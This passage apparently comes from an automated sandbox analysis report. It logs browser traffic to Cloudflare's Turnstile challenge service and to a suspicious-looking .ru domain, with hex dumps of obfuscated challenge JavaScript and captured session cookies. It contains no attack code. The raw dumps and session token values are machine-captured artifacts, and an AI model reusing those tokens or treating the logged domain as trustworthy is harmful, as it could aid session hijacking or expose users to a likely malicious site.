                                                                              Data Ascii: ,fB,fL,fW,g0,g1,g4,g5,gE,g2,g3){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1357))/1+-parseInt(gI(1287))/2+parseInt(gI(746))/3*(parseInt(gI(1355))/4)+parseInt(gI(1645))/5*(parseInt(gI(1437))/6)+parseInt(gI(904))/7*(-parseInt(g
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 3d 65 52 28 67 2c 68 2c 44 29 2c 6f 5b 67 4e 28 31 32 39 38 29 5d 28 42 2c 45 29 29 3f 67 4e 28 31 37 33 35 29 3d 3d 3d 67 4e 28 31 37 33 35 29 3f 28 46 3d 6f 5b 67 4e 28 31 30 37 32 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 67 4e 28 33 39 32 29 5d 28 68 5b 44 5d 29 2c 6f 5b 67 4e 28 31 33 34 31 29 5d 28 6f 5b 67 4e 28 31 30 35 30 29 5d 2c 6f 5b 67 4e 28 38 37 31 29 5d 28 69 2c 44 29 29 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 6f 5b 67 4e 28 35 37 33 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 6a 28 29 3a 73 28 69 2b 44 2c 45 29 3a 73 5b 67 4e 28 31 35 39 34 29 5d 3d 67 5b 67 4e 28 38 33 34 29 5d 28 68 5b 67 4e 28 31 35 39 34 29 5d 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4f 29 7b 67 4f 3d 67 4e 2c
                                                                              Data Ascii: =eR(g,h,D),o[gN(1298)](B,E))?gN(1735)===gN(1735)?(F=o[gN(1072)]('s',E)&&!g[gN(392)](h[D]),o[gN(1341)](o[gN(1050)],o[gN(871)](i,D))?s(i+D,E):F||o[gN(573)](s,i+D,h[D])):j():s(i+D,E):s[gN(1594)]=g[gN(834)](h[gN(1594)]),C++);return j;function s(G,H,gO){gO=gN,
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 54 2c 65 4d 5b 65 5b 67 55 28 31 32 37 32 29 5d 5d 26 26 28 65 4d 5b 67 55 28 31 33 36 37 29 5d 5b 67 55 28 39 34 35 29 5d 28 29 2c 65 4d 5b 67 55 28 31 33 36 37 29 5d 5b 67 55 28 31 33 33 38 29 5d 28 29 2c 65 4d 5b 67 55 28 34 38 31 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 67 55 28 31 32 37 32 29 5d 5d 5b 67 55 28 36 34 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 67 55 28 31 30 36 35 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 67 55 28 33 34 30 29 5d 5b 67 55 28 35 39 37 29 5d 2c 27 65 76 65 6e 74 27 3a 67 55 28 36 37 38 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 67 55 28 33 34 30 29 5d 5b 67 55 28 38 39 34 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 67 55 28 33 34 30 29 5d 5b 67 55 28 31 34 37 38 29 5d 2c 27 63 6f 64 65 27 3a 65
                                                                              Data Ascii: T,eM[e[gU(1272)]]&&(eM[gU(1367)][gU(945)](),eM[gU(1367)][gU(1338)](),eM[gU(481)]=!![],eM[e[gU(1272)]][gU(648)]({'source':e[gU(1065)],'widgetId':eM[gU(340)][gU(597)],'event':gU(678),'cfChlOut':eM[gU(340)][gU(894)],'cfChlOutS':eM[gU(340)][gU(1478)],'code':e
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 5b 67 56 28 39 36 35 29 5d 28 67 56 28 31 36 33 37 29 2c 69 5b 67 56 28 31 36 35 38 29 5d 29 2c 42 3d 7b 7d 2c 42 5b 67 56 28 31 35 32 37 29 5d 3d 66 2c 42 5b 67 56 28 31 34 32 35 29 5d 3d 6a 2c 42 2e 63 63 3d 67 2c 42 5b 67 56 28 33 38 34 29 5d 3d 6b 2c 42 5b 67 56 28 31 32 34 37 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 67 56 28 38 33 34 29 5d 28 42 29 2c 44 3d 67 31 5b 67 56 28 36 33 36 29 5d 28 43 29 5b 67 56 28 37 34 34 29 5d 28 27 2b 27 2c 67 56 28 31 35 30 33 29 29 2c 73 5b 67 56 28 31 35 36 36 29 5d 28 69 5b 67 56 28 31 31 35 33 29 5d 28 69 5b 67 56 28 35 36 39 29 5d 28 69 5b 67 56 28 31 31 37 36 29 5d 28 27 76 5f 27 2c 65 4d 5b 67 56 28 33 34 30 29 5d 5b 67 56 28 31 31 35 39 29 5d 29 2c 27 3d 27 29 2c 44 29 29 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 65
                                                                              Data Ascii: [gV(965)](gV(1637),i[gV(1658)]),B={},B[gV(1527)]=f,B[gV(1425)]=j,B.cc=g,B[gV(384)]=k,B[gV(1247)]=o,C=JSON[gV(834)](B),D=g1[gV(636)](C)[gV(744)]('+',gV(1503)),s[gV(1566)](i[gV(1153)](i[gV(569)](i[gV(1176)]('v_',eM[gV(340)][gV(1159)]),'='),D))}catch(E){}},e
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 65 74 75 72 6e 20 68 5e 69 7d 2c 65 5b 68 4a 28 33 35 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 65 5b 68 4a 28 31 32 38 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 65 5b 68 4a 28 37 34 39 29 5d 3d 68 4a 28 37 35 38 29 2c 65 5b 68 4a 28 34 38 34 29 5d 3d 68 4a 28 38 30 32 29 2c 65 5b 68 4a 28 31 32 33 39 29 5d 3d 68 4a 28 31 34 31 32 29 2c 66 3d 65 2c 67 3d 64 5b 68 4a 28 31 31 37 38 29 5d 2c 67 26 26 67 5b 68 4a 28 33 38 34 29 5d 3d 3d 3d 68 4a 28 38 30 32 29 26 26 66 5b 68 4a 28 31 32 38 35 29 5d 28 67 5b 68 4a 28 31 35 39 33 29 5d 2c 68 4a 28 38 37 33 29 29 3f 68 4a 28 37 35 38 29 3d 3d 3d 66 5b 68 4a 28 37 34 39 29 5d 3f 66 7a 3d 73 65 74 49 6e 74 65 72
                                                                              Data Ascii: eturn h^i},e[hJ(350)]=function(h,i){return h^i},e[hJ(1285)]=function(h,i){return h===i},e[hJ(749)]=hJ(758),e[hJ(484)]=hJ(802),e[hJ(1239)]=hJ(1412),f=e,g=d[hJ(1178)],g&&g[hJ(384)]===hJ(802)&&f[hJ(1285)](g[hJ(1593)],hJ(873))?hJ(758)===f[hJ(749)]?fz=setInter
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 27 3a 69 6d 28 31 33 37 36 29 2c 27 79 49 59 72 56 27 3a 69 6d 28 36 37 38 29 2c 27 47 49 4f 69 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 27 6f 41 4c 59 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 58 4c 45 63 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 76 41 4c 64 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 51 44 4f 4b 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 6f 53 59 65 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6c 6e 54 68 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b
                                                                              Data Ascii: ':im(1376),'yIYrV':im(678),'GIOim':function(h,i){return h^i},'oALYg':function(h,i){return h+i},'XLEcs':function(h,i){return h-i},'vALdv':function(h,i){return h&i},'QDOKe':function(h,i){return i===h},'oSYez':function(h,i){return i&h},'lnThI':function(h,i){
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 65 74 75 72 6e 20 69 70 3d 69 6f 2c 64 5b 69 70 28 31 30 33 31 29 5d 5b 69 70 28 34 31 31 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 71 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 52 2c 53 2c 4c 2c 4d 2c 55 2c 56 2c 57 2c 58 2c 59 2c 5a 2c 4e 2c 61 30 2c 61 31 29 7b 69 66 28 69 71 3d 69 6d 2c 73 3d 7b 27 46 4f 66 6d 52 27 3a 69 71 28 38 38 38 29 2c 27 52 58 63 4a 71 27 3a 69 71 28 35 33 33 29 2c 27 79 6a 72 68 43 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 72 29 7b 72 65 74 75 72 6e 20 69 72 3d 69 71 2c 64 5b 69 72 28 31 34 38 32 29 5d 28 4f 2c 50 29 7d 2c 27 54 68 6b 50 63 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 73 29 7b 72 65 74 75 72 6e 20 69 73 3d 69 71 2c 64 5b 69
                                                                              Data Ascii: eturn ip=io,d[ip(1031)][ip(411)](i)})},'g':function(i,j,o,iq,s,x,B,C,D,E,F,G,H,I,J,K,R,S,L,M,U,V,W,X,Y,Z,N,a0,a1){if(iq=im,s={'FOfmR':iq(888),'RXcJq':iq(533),'yjrhC':function(O,P,ir){return ir=iq,d[ir(1482)](O,P)},'ThkPc':function(O,P,is){return is=iq,d[i
                                                                              2025-01-20 13:17:29 UTC1369INData Raw: 29 5d 28 4f 2c 50 29 7d 2c 27 5a 6f 79 58 71 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 5e 4f 7d 7d 2c 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 42 3d 7b 7d 2c 43 3d 7b 7d 2c 44 3d 27 27 2c 45 3d 32 2c 46 3d 33 2c 47 3d 32 2c 48 3d 5b 5d 2c 49 3d 30 2c 4a 3d 30 2c 4b 3d 30 3b 4b 3c 69 5b 69 71 28 37 33 37 29 5d 3b 4b 2b 3d 31 29 69 66 28 69 71 28 36 32 30 29 3d 3d 3d 69 71 28 31 30 36 36 29 29 48 5b 73 5b 69 71 28 32 36 36 29 5d 5d 26 26 69 5b 73 5b 69 71 28 32 36 36 29 5d 5d 5b 69 71 28 36 34 38 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 71 28 38 30 32 29 2c 27 77 69 64 67 65 74 49 64 27 3a 6a 5b 69 71 28 33 34 30 29 5d 5b 69 71 28 35 39 37 29 5d 2c 27 66 65 65 64 62 61 63 6b 4f 72 69 67 69 6e 27 3a 73 5b
                                                                              Data Ascii: )](O,P)},'ZoyXq':function(O,P){return P^O}},null==i)return'';for(B={},C={},D='',E=2,F=3,G=2,H=[],I=0,J=0,K=0;K<i[iq(737)];K+=1)if(iq(620)===iq(1066))H[s[iq(266)]]&&i[s[iq(266)]][iq(648)]({'source':iq(802),'widgetId':j[iq(340)][iq(597)],'feedbackOrigin':s[


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.649827104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:29 UTC743OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:29 UTC240INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:29 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f58538bf60f7d-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:29 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.649791188.114.96.34436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:29 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                                              Host: hbv.julfolusi.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://hbv.julfolusi.ru/CZ8MDTsC/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IndzN041cXlTSkpmOWh1RFNQTkJOMVE9PSIsInZhbHVlIjoiYzhqaG1lOGdMTUVray9GNnZYV1A5NThteFJoNEJUenJxVUNDQ01oV21RUU5tZytMUmE4eDRoc1Rsc0V4MTRJOTQwTUt3elVSMUkwZnMvT2xsYlh3TEt6VjlQTmxRcXZWVTIvZFVIOGdrMGE5ems2R3R3ckxBeXpQTVN4eHdNNUYiLCJtYWMiOiIwMGQ5NDlmZjcyN2ZlZDIyYjE5ZGY5NDNiODY4NjNkMDhjOWRmNDI5M2M2NWIyY2ZjOTg0ZmQ4ZTZiZWY1YWM4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ijg4dFppd0EyTWJQWW1LOTIyMGFJRlE9PSIsInZhbHVlIjoiL0k3Z0hIZXRrUFVobU90cGtOYzVKdmhlZGhidXBhTFluL20vMnJjZG9qOElKREwvUzZoTDFUbDU4aHphRksvaWpDOTlUN3QxMUtZenVSemx1MGxDMFBna2R4NGJEbEJSaklLV0hEK1JNWXNrZldoZnA5T2N1eU1rRFYzY2pTb0EiLCJtYWMiOiI1NTk5YzY0ZjJiMjYyOTgyZmY5NGMzYmYyZjVkNmY1N2U4ZDJhNThlN2YzMDRlMGI3MWRkNjg1YzAzMzQ4YmQ2IiwidGFnIjoiIn0%3D
                                                                              2025-01-20 13:17:29 UTC1072INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Jan 2025 13:17:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: max-age=14400
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GA0KAF6bvAJqRzc9MT1TOuiCu7hTdqEDnnOwxXUGv9AwdQPkS7xFpUL%2BnFhtIWMNaUI3Z6mHq0oWe0I4VA8%2BVw17GcNYUd4ceEK%2BhcVdhPNeC5tDa%2FTmYZIaivx%2BYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Vary: Accept-Encoding
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=73005&min_rtt=73000&rtt_var=27385&sent=4&recv=8&lost=0&retrans=2&sent_bytes=2824&recv_bytes=2133&delivery_rate=38991&cwnd=54&unsent_bytes=0&cid=341563a0532db79e&ts=400&x=0"
                                                                              CF-Cache-Status: HIT
                                                                              Age: 7375
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f5855e9fc9c24-IAD
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7168&min_rtt=7168&rtt_var=2688&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1898&delivery_rate=407366&cwnd=32&unsent_bytes=0&cid=5149a4fa1a4e2c2d&ts=4726&x=0"
                                                                              2025-01-20 13:17:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.649834104.18.94.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:30 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:30 UTC240INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:30 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f58577ed2c325-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:30 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.649840104.18.94.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:30 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=904f584ecef78c84&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:30 UTC331INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:30 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 117824
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f5858a9114239-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:30 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 4b 4d 72 57 68 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.KMrWh3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30
                                                                              Data Ascii: "turnstile_success":"Success%21","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_verifying":"Verifying...","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 2c 67 33 2c 67 37 2c 67 38 2c 67 63 2c 67 64 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 31 33 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 30 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 36 33 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 38 34 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 31 36 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 36 34 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 36 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                              Data Ascii: ,g3,g7,g8,gc,gd,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1613))/1*(-parseInt(gI(590))/2)+parseInt(gI(963))/3+-parseInt(gI(684))/4+-parseInt(gI(916))/5+-parseInt(gI(1664))/6*(parseInt(gI(566))/7)+parseInt(gI(
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 5b 67 4d 28 31 35 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 49 2c 4a 29 7b 72 65 74 75 72 6e 20 49 7c 7c 4a 7d 2c 6a 5b 67 4d 28 31 34 37 31 29 5d 3d 67 4d 28 37 33 33 29 2c 6a 5b 67 4d 28 34 37 32 29 5d 3d 67 4d 28 37 33 36 29 2c 6a 5b 67 4d 28 34 37 34 29 5d 3d 67 4d 28 31 30 34 34 29 2c 6a 5b 67 4d 28 37 38 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 49 2c 4a 29 7b 72 65 74 75 72 6e 20 49 2b 4a 7d 2c 6a 5b 67 4d 28 31 31 37 35 29 5d 3d 67 4d 28 37 34 34 29 2c 6a 29 3b 74 72 79 7b 69 66 28 6b 5b 67 4d 28 31 34 31 39 29 5d 21 3d 3d 67 4d 28 31 33 30 36 29 29 7b 69 66 28 4a 3d 4f 28 50 5b 67 4d 28 31 36 31 30 29 5d 2c 51 5b 67 4d 28 31 30 31 36 29 5d 29 2c 52 5b 67 4d 28 31 36 31 30 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 53 3f 61 68 5b 67 4d 28 31 36 31 30 29
                                                                              Data Ascii: [gM(1545)]=function(I,J){return I||J},j[gM(1471)]=gM(733),j[gM(472)]=gM(736),j[gM(474)]=gM(1044),j[gM(780)]=function(I,J){return I+J},j[gM(1175)]=gM(744),j);try{if(k[gM(1419)]!==gM(1306)){if(J=O(P[gM(1610)],Q[gM(1016)]),R[gM(1610)]instanceof S?ah[gM(1610)
                                                                              2025-01-20 13:17:30 UTC1369INData Raw: 6e 75 65 3b 63 61 73 65 27 34 27 3a 69 66 28 21 48 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 48 5b 67 4d 28 31 36 37 38 29 5d 28 67 4d 28 37 33 37 29 2c 6b 5b 67 4d 28 34 37 34 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 67 5b 67 4d 28 31 36 31 30 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 67 4d 28 31 36 31 30 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 31 34 34 34 29 5d 28 67 5b 67 4d 28 31 36 31 30 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 38 35 39 29 5d 28 67 5b 67 4d 28 31 36 31 30 29 5d 29 29 3a 67 5b 67 4d 28 31 36 31 30 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 31 34 34 34 29 5d 28 67 5b 67 4d 28 31 36 31 30 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 48 5b 67 4d 28 31 31 39 36 29
                                                                              Data Ascii: nue;case'4':if(!H)return;continue;case'5':H[gM(1678)](gM(737),k[gM(474)]);continue;case'6':g[gM(1610)]instanceof Error?g[gM(1610)]=JSON[gM(1444)](g[gM(1610)],Object[gM(859)](g[gM(1610)])):g[gM(1610)]=JSON[gM(1444)](g[gM(1610)]);continue;case'7':H[gM(1196)
